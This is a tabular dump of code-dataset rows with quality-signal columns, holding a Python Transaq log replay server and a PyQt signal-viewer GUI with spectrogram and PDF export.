hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
954247760ca27215be05471a291c59564bb8fb8e | 3,872 | py | Python | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | TransaqReplayServer.py | dandolbilov/TransaqReplayer | 7477cd319632c94295eac83ea7f1ff3980925c10 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
File: TransaqReplayServer.py
Author: Daniil Dolbilov
Created: 18-Oct-2020
"""
import logging
import threading
import time
from multiprocessing.connection import Listener
class TransaqReplayServer:
    """Replays Transaq XML data-flow (xdf) log events to connected clients.

    Listens on a ``multiprocessing.connection.Listener`` endpoint; every
    accepted client gets its own thread that streams the ``[O]`` (outgoing
    callback) XML messages from the log file, in original order.
    """

    def __init__(self, xdf_file, host='localhost', port=7070,
                 authkey=b'secret phrase', event_delay=0.5):
        """
        :param xdf_file: path of the xdf log file to replay
        :param host: listen address for the Listener endpoint
        :param port: listen port for the Listener endpoint
        :param authkey: shared secret checked by Listener/Client handshake
        :param event_delay: pause in seconds inserted between replayed
            events (generalizes the previously hard-coded 0.5 s; set to 0
            for fastest replay)
        """
        self.xdf_file = xdf_file
        self.xdf_encoding = 'windows-1251'
        # Bulky reference-data messages that clients do not need replayed.
        self.skip_list = ['<pits>', '<securities>', '<sec_info_upd>']
        self.host = host
        self.port = port
        self.authkey = authkey
        self.event_delay = event_delay

    def run_server(self):
        """Accept client connections forever, spawning one replay thread each."""
        logging.info('server: listen [%s:%s]...' % (self.host, self.port))
        with Listener((self.host, self.port), authkey=self.authkey) as listener:
            logging.info('server: listen started')
            while True:
                conn = listener.accept()
                # NOTE: conn._handle is a private attribute, used only as a
                # human-readable connection id in the logs.
                logging.info('server: client accepted [%s]' % conn._handle)
                c_thread = threading.Thread(target=self.client_thread, args=(conn, ))
                c_thread.start()

    def client_thread(self, conn):
        """Thread body: replay all log events to one client, then close it."""
        self.replay_events(conn)
        logging.info('server: close [%s]' % conn._handle)
        conn.close()

    def replay_events(self, conn):
        """Stream the [O] (outgoing) XML messages from the xdf log to *conn*.

        Expected log line layout (space-separated), e.g.::

            140553.019380 [4804] [clbk] <info> [O] [830u] <markets> ...

        i.e. six header tokens followed by the XML payload.  Only lines whose
        5th token is '[O]' are replayed; payloads whose XML root appears in
        ``self.skip_list`` are dropped.  If *conn* is falsy the messages are
        only logged (dry run).
        """
        with open(self.xdf_file, mode='r', encoding=self.xdf_encoding) as f:
            for line in f:
                ss = line.split(' ')
                # An event line has >= 6 header tokens plus payload, and
                # token index 4 carries the message direction flag.
                if len(ss) < 7 or ss[4] != '[O]':
                    logging.warning('SKIP: %s' % line.strip())
                    continue
                header = ' '.join(ss[0:6])
                xml_msg = line[len(header) + 1:].strip()
                if xml_msg.startswith(tuple(self.skip_list)):
                    continue
                # Fixed pacing between events; historical timestamps are not
                # honoured yet (tune via the event_delay constructor param).
                time.sleep(self.event_delay)
                msg_trimmed = xml_msg[:50]  # data is very long, just log some chunk
                if conn:
                    logging.debug('[%s] send: %s ...' % (conn._handle, msg_trimmed))
                    conn.send(xml_msg)
                else:
                    logging.debug('no_conn: %s ...' % msg_trimmed)
if __name__ == '__main__':
    # DEBUG level so every replayed message chunk shows up in the console.
    logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)-8s [%(name)s] %(message)s')
    log_path = '../logs/2020.10.16-140551/20201016_xdf.log'
    TransaqReplayServer(log_path).run_server()
| 45.552941 | 187 | 0.563791 | 450 | 3,872 | 4.742222 | 0.457778 | 0.033739 | 0.050609 | 0.054827 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0.059981 | 0 | 0.122688 | 0.27376 | 3,872 | 84 | 188 | 46.095238 | 0.636202 | 0.366477 | 0 | 0.041667 | 0 | 0 | 0.126137 | 0.01737 | 0 | 0 | 0 | 0.011905 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
954fc6dfbe050a3ecc085052cc9413b2339d8905 | 23,528 | py | Python | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | Signal-Viewer/Signal-Viewer.py | Radwa-Saeed/Didital-Signal-Processing-PyQt-GUI | 8d97e2925a20dd6a74d4bc0613bfceea668f2731 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'newGui.ui'
#
# Created by: PyQt5 UI code generator 5.15.2
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets ,QtPrintSupport
from pyqtgraph import PlotWidget ,PlotItem
import os
import pathlib
import pyqtgraph as pg
import pandas as pd
import numpy as np
import sys
import random
import matplotlib
import matplotlib.pyplot as plt
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
class Ui_MainWindow(QtGui.QMainWindow):
    # NOTE(review): everything below is a *class-level* mutable container,
    # shared by every Ui_MainWindow instance.  The application only ever
    # creates one instance, but confirm before reusing this class.
    signals = []      # PlotWidget per channel row (3 rows)
    timer = []        # one QTimer per opened signal file
    data = []         # loaded sample arrays, one per opened file
    n = []            # samples currently drawn, per opened signal
    nn = []           # left edge of the scrolling x-window, per opened signal
    data_line = []    # pyqtgraph curve items, one per opened signal
    r = [1200,1200,1200]   # visible x-range width, one per channel row
    z = [1,1,1]            # zoom factor, one per channel row
    spectrogram = []  # QLabel per channel row showing the spectrogram image
    checkBox = []     # per-row enable checkbox
    counter = -1      # index of the most recently opened signal (-1 = none)
def setupUi(self, MainWindow):
    """Build the main window UI and wire it up.

    Creates three channel rows (plot + spectrogram label + checkbox), a
    toolbar of push buttons, the menu bar with its actions, hides the rows
    until a signal is opened, and connects every control to its handler.
    The original pyuic5 output repeated the same button/action boilerplate
    nine times each; that is factored into _make_tool_button/_make_action.
    """
    MainWindow.setObjectName("MainWindow")
    MainWindow.resize(1010, 878)
    mW = QtGui.QIcon("Mw.png")
    MainWindow.setWindowIcon(mW)
    self.centralwidget = QtWidgets.QWidget(MainWindow)
    self.centralwidget.setObjectName("centralwidget")
    # One row per channel: (plot/spectrogram y-offset, checkbox y-offset).
    row_y = ((90, 50), (340, 300), (600, 560))
    for i in range(0, 3):
        self.signals.append(PlotWidget(self.centralwidget))
        self.spectrogram.append(QtWidgets.QLabel(self.centralwidget))
        self.checkBox.append(QtWidgets.QCheckBox(self.centralwidget))
        y_widgets, y_check = row_y[i]
        self.signals[i].setGeometry(QtCore.QRect(20, y_widgets, 461, 192))
        self.signals[i].setObjectName("signal_%d" % (i + 1))
        self.spectrogram[i].setGeometry(QtCore.QRect(490, y_widgets, 471, 192))
        self.spectrogram[i].setObjectName("spectro_%d" % (i + 1))
        self.checkBox[i].setGeometry(QtCore.QRect(20, y_check, 68, 20))
        self.checkBox[i].setObjectName("check_%d" % (i + 1))
        self.signals[i].setStyleSheet("background-color:rgb(0, 0, 0);")
        self.signals[i].setRubberBandSelectionMode(QtCore.Qt.IntersectsItemBoundingRect)
        self.signals[i].plotItem.showGrid(x=True, y=True )
        self.signals[i].plotItem.setMenuEnabled(False)
        self.checkBox[i].setStyleSheet("font: 10pt \"MS Shell Dlg 2\";")
        self.spectrogram[i].setScaledContents(True)
    # Toolbar buttons, left to right in 30 px steps.
    self.open = self._make_tool_button(0, "img/open.png", "open")
    self.save = self._make_tool_button(30, "img/save.png", "save")
    self.Zoom_in = self._make_tool_button(60, "img/zoom-in.png", "Zoom_in")
    self.zoom_out = self._make_tool_button(90, "img/zoom-out.png", "zoom_out")
    self.left = self._make_tool_button(120, "img/previous.png", "left")
    self.play = self._make_tool_button(150, "img/play.png", "play")
    self.right = self._make_tool_button(180, "img/next.png", "right")
    self.pause = self._make_tool_button(210, "img/pause.png", "pause")
    # The spectrogram button registered its pixmap for the QIcon 'On' state.
    self.spec = self._make_tool_button(240, "img/spec3.jpeg", "spec", on_state=True)
    # z-order exactly as emitted by the original generated .ui code.
    self.Zoom_in.raise_()
    self.signals[0].raise_()
    self.checkBox[1].raise_()
    self.spectrogram[1].raise_()
    self.spectrogram[2].raise_()
    self.checkBox[2].raise_()
    self.spectrogram[0].raise_()
    self.signals[1].raise_()
    self.signals[2].raise_()
    self.checkBox[0].raise_()
    self.zoom_out.raise_()
    self.save.raise_()
    self.open.raise_()
    self.pause.raise_()
    self.play.raise_()
    self.right.raise_()
    self.left.raise_()
    MainWindow.setCentralWidget(self.centralwidget)
    # Menu bar and menus.
    self.menubar = QtWidgets.QMenuBar(MainWindow)
    self.menubar.setGeometry(QtCore.QRect(0, 0, 1010, 21))
    self.menubar.setObjectName("menubar")
    self.menuFile = QtWidgets.QMenu(self.menubar)
    self.menuFile.setObjectName("menuFile")
    self.menuEdit = QtWidgets.QMenu(self.menubar)
    self.menuEdit.setObjectName("menuEdit")
    self.menuSignal_tools = QtWidgets.QMenu(self.menubar)
    self.menuSignal_tools.setObjectName("menuSignal_tools")
    self.menuPlay_navigate = QtWidgets.QMenu(self.menubar)
    self.menuPlay_navigate.setObjectName("menuPlay_navigate")
    MainWindow.setMenuBar(self.menubar)
    # Menu actions (icon filenames kept byte-identical to the original).
    self.actionOpen = self._make_action(MainWindow, "search.png", "actionOpen")
    self.actionzoom_in = self._make_action(MainWindow, "zoom-in_1.png", "actionzoom_in")
    self.actionzoom_out = self._make_action(MainWindow, "zoom-out.png", "actionzoom_out")
    self.actionSpectrogram = self._make_action(MainWindow, "sound.png", "actionSpectrogram")
    self.actionPlay = self._make_action(MainWindow, "play-button.png", "actionPlay")
    self.actionPause = self._make_action(MainWindow, "pause-button.png", "actionPause")
    self.actionBackward = self._make_action(MainWindow, "backward.png", "actionBackward")
    self.actionForward = self._make_action(MainWindow, "forward.png", "actionForward")
    self.actionSave_as_pdf = self._make_action(MainWindow, "pdf-file.png", "actionSave_as_pdf")
    self.menuFile.addAction(self.actionOpen)
    self.menuFile.addSeparator()
    self.menuFile.addAction(self.actionSave_as_pdf)
    self.menuEdit.addAction(self.actionzoom_in)
    self.menuEdit.addAction(self.actionzoom_out)
    self.menuSignal_tools.addAction(self.actionSpectrogram)
    self.menuPlay_navigate.addAction(self.actionPlay)
    self.menuPlay_navigate.addAction(self.actionPause)
    self.menuPlay_navigate.addSeparator()
    self.menuPlay_navigate.addAction(self.actionBackward)
    self.menuPlay_navigate.addAction(self.actionForward)
    self.menubar.addAction(self.menuFile.menuAction())
    self.menubar.addAction(self.menuEdit.menuAction())
    self.menubar.addAction(self.menuPlay_navigate.menuAction())
    self.menubar.addAction(self.menuSignal_tools.menuAction())
    # Every row starts hidden until a signal file is opened.
    for i in range(0, 3):
        self.signals[i].hide()
        self.checkBox[i].hide()
        self.spectrogram[i].hide()
    self.retranslateUi(MainWindow)
    QtCore.QMetaObject.connectSlotsByName(MainWindow)
    # Wire menu actions and toolbar buttons to their handlers.
    self.actionOpen.triggered.connect(lambda: self.opensignal())
    self.actionzoom_in.triggered.connect(lambda: self.zoomin())
    self.actionzoom_out.triggered.connect(lambda: self.zoomout())
    self.actionSave_as_pdf.triggered.connect(lambda: self.savepdf())
    self.actionBackward.triggered.connect(lambda: self.scrlleft())
    self.actionForward.triggered.connect(lambda: self.scrlright())
    self.actionSpectrogram.triggered.connect(lambda: self.spectro())
    self.actionPlay.triggered.connect(lambda: self.playy())
    self.actionPause.triggered.connect(lambda: self.pausee())
    self.Zoom_in.clicked.connect(lambda: self.zoomin())
    self.zoom_out.clicked.connect(lambda: self.zoomout())
    self.left.clicked.connect(lambda: self.scrlleft())
    self.right.clicked.connect(lambda: self.scrlright())
    self.pause.clicked.connect(lambda: self.pausee())
    self.play.clicked.connect(lambda: self.playy())
    self.open.clicked.connect(lambda: self.opensignal())
    self.save.clicked.connect(lambda: self.savepdf())
    self.spec.clicked.connect(lambda: self.spectro())

def _make_tool_button(self, x, icon_path, name, on_state=False):
    """Create one 35x35 toolbar button at horizontal offset *x*.

    *on_state* selects whether the pixmap is registered for the QIcon
    'On' state (used only by the spectrogram button) instead of 'Off'.
    """
    button = QtWidgets.QPushButton(self.centralwidget)
    button.setGeometry(QtCore.QRect(x, 1, 35, 35))
    button.setText("")
    icon = QtGui.QIcon()
    state = QtGui.QIcon.On if on_state else QtGui.QIcon.Off
    icon.addPixmap(QtGui.QPixmap(icon_path), QtGui.QIcon.Normal, state)
    button.setIcon(icon)
    button.setObjectName(name)
    return button

def _make_action(self, MainWindow, icon_path, name):
    """Create a QAction owned by *MainWindow* with the given icon file."""
    action = QtWidgets.QAction(MainWindow)
    icon = QtGui.QIcon()
    icon.addPixmap(QtGui.QPixmap(icon_path), QtGui.QIcon.Normal, QtGui.QIcon.Off)
    action.setIcon(icon)
    action.setObjectName(name)
    return action
def readsignal(self):
    """Ask the user for a data file and append its samples to self.data.

    NOTE(review): the dialog advertises xls/txt/csv, but np.genfromtxt is a
    plain-text parser; a real .xls file would need a different reader and
    os.getenv('home') is lowercase (usually unset) — confirm both.
    """
    self.fname=QtGui.QFileDialog.getOpenFileName(self,' txt or CSV or xls',os.getenv('home'),"xls(*.xls) ;; text(*.txt) ;; csv(*.csv)")
    path=self.fname[0]
    self.data.append(np.genfromtxt(path))
def opensignal(self):
    """Load a new signal file and start its animated playback.

    The target plot row is counter % 3, so a fourth opened file reuses
    row 0.  A fresh 50 ms QTimer drives one of the three (identical)
    update_data handlers for that row.

    NOTE(review): timer/data/n/nn grow with every opened file while r and
    z only have 3 entries; the update handlers index r[x]/z[x] by the
    unbounded counter, so a 4th file likely raises IndexError — confirm.
    """
    self.readsignal()
    self.counter+=1
    self.n.append(0)
    self.nn.append(0)
    self.data_line.append(self.signals[self.counter % 3].plot(self.data[self.counter], name="mode2"))
    self.pen = pg.mkPen(color=(255, 0, 0))
    # Set timer
    self.timer.append(pg.QtCore.QTimer())
    # Timer signal binding update_data function; one handler per plot row.
    x = self.counter
    if x%3 == 0:
        self.timer[x].timeout.connect(lambda: self.update_data1(x))
        self.timer[x].start(50)
    if x%3 == 1:
        self.timer[x].timeout.connect(lambda: self.update_data2(x))
        self.timer[x].start(50)
    if x%3 == 2:
        self.timer[x].timeout.connect(lambda: self.update_data3(x))
        self.timer[x].start(50)
    # The timer interval is 50ms, which can be understood as refreshing data once in 50ms
    #self.timer1.start(50)
    self.signals[x%3].show()
    self.checkBox[x%3].show()
    self.checkBox[x%3].setChecked(True)
# Data shift left
def update_data1(self,index):
    """Playback tick for a signal: draw 10 more samples per tick.

    Three phases: fill (x-range anchored at 0 until 1000 samples drawn),
    scroll (a window of width r[index] slides right with the data), and
    finished (show the whole signal scaled by the current zoom factor).

    NOTE(review): self.r / self.z only hold 3 entries, so index > 2
    (a 4th opened file) would raise IndexError here — confirm.
    """
    if self.n[index] < len(self.data[index]) :
        if self.n[index] < 1000 :
            # Fill phase: window anchored at 0.
            self.n[index] += 10
            self.data_line[index].setData(self.data[index][0 : self.n[index]])
            self.signals[index%3].plotItem.setXRange(0, self.r[index] , padding=0)
        else :
            # Scroll phase: both the sample count and the left edge advance.
            self.nn[index] += 10
            self.n[index] += 10
            self.data_line[index].setData(self.data[index][0 : self.n[index]])
            self.signals[index%3].plotItem.setXRange(self.nn[index],self.r[index] +self.nn[index] , padding=0)
            self.z[index] = 1
    else :
        # Finished: show the full signal at the current zoom factor.
        self.data_line[index].setData(self.data[index][0 : self.n[index]])
        self.signals[index%3].plotItem.setXRange(0 , len(self.data[index]) * self.z[index] , padding=0)
def update_data2(self,index):
    """Playback tick for the second plot row.

    The update logic is byte-for-byte identical for every row, so this
    delegates to update_data1, which is kept as the single implementation,
    instead of maintaining a second copy of the same code.
    """
    self.update_data1(index)
def update_data3(self,index):
    """Playback tick for the third plot row.

    The update logic is byte-for-byte identical for every row, so this
    delegates to update_data1, which is kept as the single implementation,
    instead of maintaining a third copy of the same code.
    """
    self.update_data1(index)
def spectro(self):
    """Render a spectrogram (matplotlib.specgram, Fs=250) for each checked
    row, save it as spectro<i>.png and show it in that row's QLabel.

    NOTE(review): `index` is the start of the latest group of up to three
    opened signals (largest multiple of 3 <= len(data)-1); the i==1 / i==2
    branches fall back to signals of the *previous* group when the current
    group is not full — confirm this mapping matches the intended UX.
    """
    index = (len(self.data) - 1) - ((len(self.data)-1)%3)
    for i in range (0,3):
        if (self.checkBox[i].isChecked()==True):
            self.spectrogram[i].show()
            if i==0:
                plt.specgram(self.data[index], Fs= 250 )
            elif i == 1:
                if (len(self.data ) - 1 - index >= 1):
                    plt.specgram(self.data[index + 1], Fs= 250 )
                else:
                    plt.specgram(self.data[index - 2], Fs= 250 )
            else:
                if (len(self.data) - 1 - index == 2):
                    plt.specgram(self.data[index + 2], Fs= 250 )
                else:
                    plt.specgram(self.data[index - 1], Fs= 250 )
            # Figure goes through the filesystem: saved as PNG, then loaded
            # back into the label as a pixmap.
            plt.savefig('spectro'+str(i)+'.png', dpi=300, bbox_inches='tight')
            self.spectrogram[i].setPixmap(QtGui.QPixmap('spectro'+str(i)+'.png'))
            plt.close(None)
def pausee(self):
    """Stop the playback timer of every row whose checkbox is ticked."""
    for channel in range(3):
        if not self.checkBox[channel].isChecked():
            continue
        if self.timer[channel].isActive():
            self.timer[channel].stop()
def playy(self):
    """Restart the playback timer of every checked row that is paused."""
    for channel in range(3):
        if self.checkBox[channel].isChecked() and not self.timer[channel].isActive():
            self.timer[channel].start()
def zoomin(self):
    """Halve the visible x-range of every checked row (zoom in 2x)."""
    for channel in range(3):
        if self.checkBox[channel].isChecked():
            view_box = self.signals[channel].plotItem.getViewBox()
            view_box.scaleBy(x=0.5, y=1)
            # Track the narrower window and zoom factor for the updaters.
            self.r[channel] *= 0.5
            self.z[channel] *= 0.5
def zoomout(self):
    """Double the visible x-range of every checked row (zoom out 2x)."""
    for channel in range(3):
        if self.checkBox[channel].isChecked():
            view_box = self.signals[channel].plotItem.getViewBox()
            view_box.scaleBy(x=2, y=1)
            # Track the wider window and zoom factor for the updaters.
            self.r[channel] *= 2
            self.z[channel] *= 2
def scrlleft(self):
    """Pan every checked row 100 x-units to the left."""
    for channel in range(3):
        if self.checkBox[channel].isChecked():
            self.signals[channel].plotItem.getViewBox().translateBy(x=-100, y=0)
def scrlright(self):
    """Pan every checked row 100 x-units to the right."""
    for channel in range(3):
        if self.checkBox[channel].isChecked():
            self.signals[channel].plotItem.getViewBox().translateBy(x=100, y=0)
#
def savepdf(self):
    """Export the checked signals and their spectrograms to a PDF.

    Builds a 3x2 matplotlib grid (row per channel: signal on the left,
    spectrogram on the right) using the same group-of-three index fallback
    as spectro(), shows the figure, then asks for a save path.

    NOTE(review): the file filter string "PDF files(.pdf);;AllFiles()"
    lacks the '*' wildcards Qt filters normally use — confirm the dialog
    actually lists .pdf files.
    """
    fig=plt.figure(figsize=(1000, 1000))
    # Start of the latest group of up to three opened signals.
    index = (len(self.data) - 1) - ((len(self.data)-1)%3)
    spectrogramData = []
    for i in range (0,3):
        if (self.checkBox[i].isChecked()==True):
            if i == 0:
                plt.subplot(3,2,1)
                spectrogramData = list(self.data[index][0:])
                plt.plot(spectrogramData,linewidth=0.5,scalex=True)
                plt.subplot(3,2,2)
            elif i == 1:
                # Current group has a 2nd signal; otherwise reuse previous group.
                if (len(self.data ) - 1 - index >= 1):
                    plt.subplot(3,2,3)
                    spectrogramData = list(self.data[index+1][0:])
                    plt.plot(spectrogramData,linewidth=0.5,scalex=True)
                    plt.subplot(3,2,4)
                else:
                    plt.subplot(3,2,3)
                    spectrogramData = list(self.data[index-2][0:])
                    plt.plot(spectrogramData,linewidth=0.5,scalex=True)
                    plt.subplot(3,2,4)
            else:
                # Current group has a 3rd signal; otherwise reuse previous group.
                if (len(self.data) - 1 - index == 2):
                    plt.subplot(3,2,5)
                    spectrogramData = list(self.data[index+2][0:])
                    plt.plot(spectrogramData,linewidth=0.5,scalex=True)
                    plt.subplot(3,2,6)
                else:
                    plt.subplot(3,2,5)
                    spectrogramData = list(self.data[index-1][0:])
                    plt.plot(spectrogramData,linewidth=0.5,scalex=True)
                    plt.subplot(3,2,6)
            # Right-hand subplot of the row: spectrogram of the same data.
            plt.specgram(spectrogramData, Fs= 250)
    plt.subplots_adjust(bottom=0.1,right=0.9,top=1.0)
    plt.show()
    fn,_=QtWidgets.QFileDialog.getSaveFileName(self,"Export PDF",None,"PDF files(.pdf);;AllFiles()")
    if fn:
        # Default to a .pdf suffix when the user typed none.
        if QtCore.QFileInfo(fn).suffix()=="":
            fn+=".pdf"
        fig.savefig(fn)
def retranslateUi(self, MainWindow):
    """Set all user-visible strings and keyboard shortcuts (pyuic5
    translation hook); called once from setupUi."""
    _translate = QtCore.QCoreApplication.translate
    MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
    # Per-row checkboxes toggle with the 1/2/3 keys.
    self.checkBox[1].setText(_translate("MainWindow", "signal-2"))
    self.checkBox[1].setShortcut(_translate("MainWindow", "2"))
    self.checkBox[2].setText(_translate("MainWindow", "signal-3"))
    self.checkBox[2].setShortcut(_translate("MainWindow", "3"))
    self.checkBox[0].setText(_translate("MainWindow", "signal-1"))
    self.checkBox[0].setShortcut(_translate("MainWindow", "1"))
    self.menuFile.setTitle(_translate("MainWindow", "File"))
    self.menuEdit.setTitle(_translate("MainWindow", "Edit"))
    self.menuSignal_tools.setTitle(_translate("MainWindow", "Signal tools"))
    self.menuPlay_navigate.setTitle(_translate("MainWindow", "Play and navigate "))
    self.actionOpen.setText(_translate("MainWindow", "Open"))
    self.actionOpen.setShortcut(_translate("MainWindow", "Ctrl+o"))
    self.actionzoom_in.setText(_translate("MainWindow", "Zoom-in"))
    self.actionzoom_in.setShortcut(_translate("MainWindow", "Up"))
    self.actionzoom_out.setText(_translate("MainWindow", "Zoom-out"))
    self.actionzoom_out.setShortcut(_translate("MainWindow", "Down"))
    self.actionSpectrogram.setText(_translate("MainWindow", "Spectrogram"))
    self.actionSpectrogram.setShortcut(_translate("MainWindow", "S"))
    self.actionPlay.setText(_translate("MainWindow", "Play"))
    self.actionPlay.setShortcut(_translate("MainWindow", "Space"))
    self.actionPause.setText(_translate("MainWindow", "Pause"))
    self.actionPause.setShortcut(_translate("MainWindow", "Shift+Space"))
    self.actionBackward.setText(_translate("MainWindow", "Backward"))
    self.actionBackward.setShortcut(_translate("MainWindow", "Left"))
    self.actionForward.setText(_translate("MainWindow", "Forward"))
    self.actionForward.setShortcut(_translate("MainWindow", "Right"))
    self.actionSave_as_pdf.setText(_translate("MainWindow", "Save as pdf"))
    self.actionSave_as_pdf.setShortcut(_translate("MainWindow", "Ctrl+S"))
if __name__ == "__main__":
    import sys

    # Standard Qt bootstrap: build the window, attach the generated UI, run.
    app = QtWidgets.QApplication(sys.argv)
    main_window = QtWidgets.QMainWindow()
    ui = Ui_MainWindow()
    ui.setupUi(main_window)
    main_window.show()
    sys.exit(app.exec_())
| 44.225564 | 139 | 0.604429 | 2,731 | 23,528 | 5.15086 | 0.127792 | 0.039099 | 0.023104 | 0.026871 | 0.410464 | 0.314708 | 0.3044 | 0.253075 | 0.210066 | 0.18618 | 0 | 0.032911 | 0.25612 | 23,528 | 531 | 140 | 44.308851 | 0.770826 | 0.018914 | 0 | 0.215247 | 1 | 0 | 0.05281 | 0.001994 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033632 | false | 0 | 0.03139 | 0 | 0.091928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
954ff8fe22f97bb0d6f0b4fdb7dcaa8184355aa0 | 868 | py | Python | optimal_transport_morphometry/core/rest/__init__.py | girder/otm-server | 7abfe9c2d659c962784e28058d8f9a8ffc1f4991 | [
"Apache-2.0"
